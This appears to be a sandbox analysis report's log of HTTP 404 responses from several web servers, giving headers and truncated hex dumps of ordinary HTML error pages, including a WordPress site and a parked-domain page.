            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:07 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:10 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:12 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:34 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 0X-nginx-cache: WordPressConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 2c 22 64 65 73 63 72 69 Data Ascii: 4000<!DOCTYPE html><h
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:37 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 0X-nginx-cache: WordPressConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 2c 22 64 65 73 63 72 69 Data Ascii: 4000<!DOCTYPE html><h
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:01:40 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 0X-nginx-cache: WordPressConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 2c 22 64 65 73 63 72 69 Data Ascii: 4000<!DOCTYPE html><h
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 10:02:40 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 